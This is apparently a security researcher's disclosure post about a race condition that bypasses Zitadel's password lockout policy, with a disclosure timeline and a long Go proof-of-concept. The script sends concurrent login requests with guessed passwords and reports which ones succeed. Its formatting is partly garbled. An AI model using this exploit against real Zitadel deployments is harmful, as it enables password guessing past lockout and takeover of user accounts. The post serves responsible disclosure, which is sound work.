Security Feature Bypass In Zitadel

November 13, 2023

Vulnerability Discovery

After Ethan Mckee-Harris discovered CVE-2023-46238 (which you can read about here) during his testing of a Zitadel deployment, Jack Moran undertook additional research of the Zitadel platform in preparation for his talk at CHCon 2023.

This research revealed that the Zitadel platform provides a “password lockout policy” feature, that can be configured to lock out users in the event that too many failed authentication attempts are made. However, this feature appeared to be subject to a race condition similar to one Jack previously discovered in Microsoft’s ASP.NET SignInManager (read more here). By sending requests concurrently to the sign-in function located at /ui/login/password it resulted in a large number of these requests being processed before the configured password lockout policy being triggered.

Testing revealed that the race condition could be exploited without any need for a last-byte-sync attack or single-packet attack, and could be exploited just by sending crafted requests concurrently and as fast as possible, making this race condition trivial to exploit. Off-the-shelf tools such as Burp Suite’s intruder, and Turbo Intruder could also be used to execute this attack.

A proof of concept (PoC) was developed to exploit this issue in addition to using the aforementioned tooling in order to initially isolate it.

‍

Proof of concept video

// todo

‍

Proof of concept code

_package_main_import_{( "crypto/tls" "flag" "fmt" "io" "math/rand" "net" "net/http" "net/url" "strconv" "strings" "syscall" "time" )}_func_race(fqdn_string_{, cookieLoginCSRF}_string_{, cookieUserAgent}_string_{, paramGorillaCSRFToken}_string_{, paramAuthRequestID}_string_{, paramLoginName}_string_{, password}_string_{, channel}_chan_string_{) {}_{// Create a proxy to use in the HTTP transport}_{proxyURL, proxyError}_:=_url_._{Parse("http://127.0.0.1:8081")}_if_proxyError_!=_{nil {}_{// Return an error to indicate a proxy couldnt be created}_fmt_._{Println("Error parsing proxy URL:", proxyError)}_return_}_{// Create a HTTP transport}_transport_:=_&_http_._{Transport { Proxy}_:_http_._{ProxyURL(proxyURL), TLSClientConfig}_:_&_tls_._{Config{InsecureSkipVerify}_:_{true}, ForceAttemptHTTP2}_:_{true, DialContext}_:₍_&_net_._{Dialer { Timeout}_:₃₀_*_time_._{Second, KeepAlive}_:₃₀_*_time_._{Second, DualStack}_:_{true, Control}_:_func_{(network, address}_string_{, c syscall}_._RawConn)_error_{_var_fn₌_func_(s_uintptr_{) { syscall}_._{SetsockoptInt(}_int_{(s), syscall}_._{IPPROTO_TCP, syscall}_._{TCP_NODELAY, 1) }}_return_c_._{Control(fn) }, })}_._{DialContext, }}_{// Create a client with the custom transport, that does not follow redirects...}_client_:=_&_http_._{Client{ Transport}_:_{transport, CheckRedirect}_:_func_(req_*_http_._{Request, via []}_*_http_._Request)_error_{_{// Return an error to prevent redirects}_return_http_._{ErrUseLastResponse }, }}_{// Set request body paramaters}_data_:=_url_._{Values{} data}_._{Set("gorilla.csrf.Token", paramGorillaCSRFToken) data}_._{Set("authRequestID", paramAuthRequestID) data}_._{Set("loginName", paramLoginName) data}_._{Set("password", fmt}_._{Sprintf("%v", password)) postBody}_:=_strings_._{NewReader(data}_._Encode())_{// Create a new request}_{createPostRequest, createPostRequestError}_:=_http_._{NewRequest("POST", fqdn, postBody)}_if_{createPostRequestError}_!=_{nil {}_{// Return an error to indicate a request could not be created}_fmt_._{Println("Error creating request:", createPostRequestError)}_return_}_{// Set request headers and cookies}_{createPostRequest}_._Header_._{Set("Content-Type", "application/x-www-form-urlencoded") createPostRequest}_._AddCookie(_&_http_._Cookie{Name_:_{"zitadel.login.csrf", Value}_:_{cookieLoginCSRF}) createPostRequest}_._AddCookie(_&_http_._Cookie{Name_:_{"zitadel.useragent", Value}_:_{cookieUserAgent})}_{// Send HTTP request}_{sendPostRequest, sendPostRequestError}_:=_client_._{Do(createPostRequest)}_if_{sendPostRequestError}_!=_{nil {}_{// Return an error to indicate a request could not be made}_fmt_._{Println("Error making request:", sendPostRequestError)}_return_}_defer_{sendPostRequest}_._Body_._Close()_{// Read HTTP response}_{readResponseBody, readResponseBodyError}_:=_io_._{ReadAll(sendPostRequest}_._Body)_if_{readResponseBodyError}_!=_{nil {}_{// Return an error to indicate a the response body could not be read}_fmt_._{Println("Error reading response body:", readResponseBodyError)}_return_{} responseText}_:=_string_{(readResponseBody)}_{// ======================================================================================================}_{// (TRYING TO) ACCOUNT FOR ALL OBSERVED CASES}_{// 1. Fail cases:}_{// - Login failed - HTTP Response body contains ("Password is invalid")}_{// - CSRF token invalid - HTTP Response body contain ("CSRF token invalid (Internal)")}_{// - Login locked - HTTP Response body contains ("User is locked") and does not contain ("An internal error occurred")}_//_{// 2. Indeterminate success cases:}_{// - User locked (Internal) - HTTP Response body contains ("User is locked") and contains ("An internal error occurred") <- This could either be a success or a fail check the logs}_{// - SQLSTATE error - HTTP Response body contains ("SQLSTATE") <- This could either be a success or a fail check the logs, most of the time it appears to be a fail.}_//_{// 3. Success cases:}_{// - Login success - redirect}_{// - Login success - no redirect and HTTP Response body does not contain ("lgn-error-message")}_//_{// NOTES:}_{// - Due to the nature of racing, it appears that two cases can determine if auth has worked}_{// - The expected outcome is a 302 response.}_{// - The unexpected outcome a 200 response.}_{// ======================================================================================================}_if_strings_._{Contains(responseText, "Password is invalid") {}_{// Login fail case}_fmt_._{Printf("[\033[31m!\033[0m] Login failed -- Password: %s\n", password) }}_else_if_strings_._{Contains(responseText, "CSRF token invalid (Internal)") {}_{// CSRF token invalid}_fmt_._{Println("[\033[31m!\033[0m] Looks Like You Need To Update Your CSRF Token") }}_else_if_strings_._{Contains(responseText, "User is locked")}_&&_!_strings_._{Contains(responseText, "An internal error occurred") {}_{// Login locked - not an internal error}_fmt_._{Printf("[\033[33m-\033[0m] Login locked -- Password: %s\n", password) }}_else_if_strings_._{Contains(responseText, "User is locked")}_&&_strings_._{Contains(responseText, "An internal error occurred") {}_{// Login locked - An internal error - Logs indicate that this can be a successful login *SIGH*}_fmt_._{Printf("[\033[33m?\033[0m] Login locked - Internal error detected - check logs! -- Password: %s\n", password) }}_else_if_strings_._{Contains(responseText, "SQLSTATE") {}_{// SQLSTATE - SQL ERROR - Logs indicate that this can be a successful login *SIGH*}_fmt_._{Printf("[\033[33m?\033[0m] SQLSTATE - SQL error detected - check logs! -- Password: %s\n", password) }}_else_if_!_strings_._{Contains(responseText, "lgn-error-message") {}_{// Login success - No redirect or lgn-error-message - Logs indicate that this can be a successful login *SIGH*}_fmt_._{Printf("[\033[32m✓\033[0m] Login Success - No redirect detected or lgn-error-message - Check Logs! -- Password: %s\n", password) }}_else_if_{sendPostRequest}_._StatusCode₌₌_{302 {}_{// Login success}_fmt_._{Printf("[\033[32m✓\033[0m] Login Success - Redirection Detected -- Password: %s\n", password) } }}_func_{main() {}_{//Create an argument parser}_{numberOfRequestsPtr}_:=_flag_._{Int("number_of_requests", 0, "number of tasks") urlPtr}_:=_flag_._{String("zitadel_url", "", "URL") cookieLoginCsrfPtr}_:=_flag_._{String("zitadel_cookie_login_csrf", "", "Cookie Login CSRF") cookieUserAgentPtr}_:=_flag_._{String("zitadel_cookie_useragent", "", "Cookie UserAgent") paramCsrfPtr}_:=_flag_._{String("zitadel_param_csrf", "", "Parameter CSRF") paramAuthRequestIDPtr}_:=_flag_._{String("zitadel_param_auth_request_id", "", "Parameter Auth Request ID") paramLoginNamePtr}_:=_flag_._{String("zitadel_param_login_name", "", "Parameter Login Name") flag}_._Parse()_{// Define additional variables}_channel_:=_make(_chan_string_{) randomPoint}_:=_rand_._Intn(_*_{numberOfRequestsPtr)}_for_i_:=_{0; i}_<_*_{numberOfRequestsPtr; i}₊₊_{{ randomPassword}_:=_"Aa"₊_strconv_._Itoa(rand_._Int())₊_"!"_if_i₌₌_{randomPoint { randomPassword}₌_{"Password2!" }}_go_race(_*_urlPtr,_*_{cookieLoginCsrfPtr,}_*_{cookieUserAgentPtr,}_*_{paramCsrfPtr,}_*_{paramAuthRequestIDPtr,}_*_{paramLoginNamePtr, randomPassword, channel) }}_{// Collect the results or completion signals}_for_i_:=_{0; i}_<_*_{numberOfRequestsPtr; i}₊₊_{{ fmt}_._Println(_‍_{channel) } }}

Proof of Concept reproduction steps

_//////_{// TO RUN:}_{// Please replace values within ' ' with values from the application:}_{// ./race-to-auth-zitidel \}_{// --zitadel_url ' ' \}_{// --zitadel_cookie_login_csrf ' ' \}_{// --zitadel_cookie_useragent ' ' \}_{// --zitadel_param_csrf ' ' \}_{// --zitadel_param_auth_request_id ' ' \}_{// --zitadel_param_login_name ' ' \}_{// --numberOfRequests 20}_//_{// By: itz_d0dgy}

Fixed Releases

Update to the latest version of Zitadel. It has been patched in the following versions:

Vulnerability Disclosure Timeline (NZT):

27/10/2023 - Race condition discovered
31/10/2023 - Race condition disclosed
01/11/2023 - Zitadel acknowledges the disclosure and begins internal testing
04/11/2023 - Zitadel validates vulnerability disclosure
07/11/2023 - Zitadel issues CVE using Github CNA
08/11/2023 - Zitadel publishes advisory and fix
13/11/2023 - Blog post released

Security Feature Bypass In Zitadel

Introduction

The Vulnerability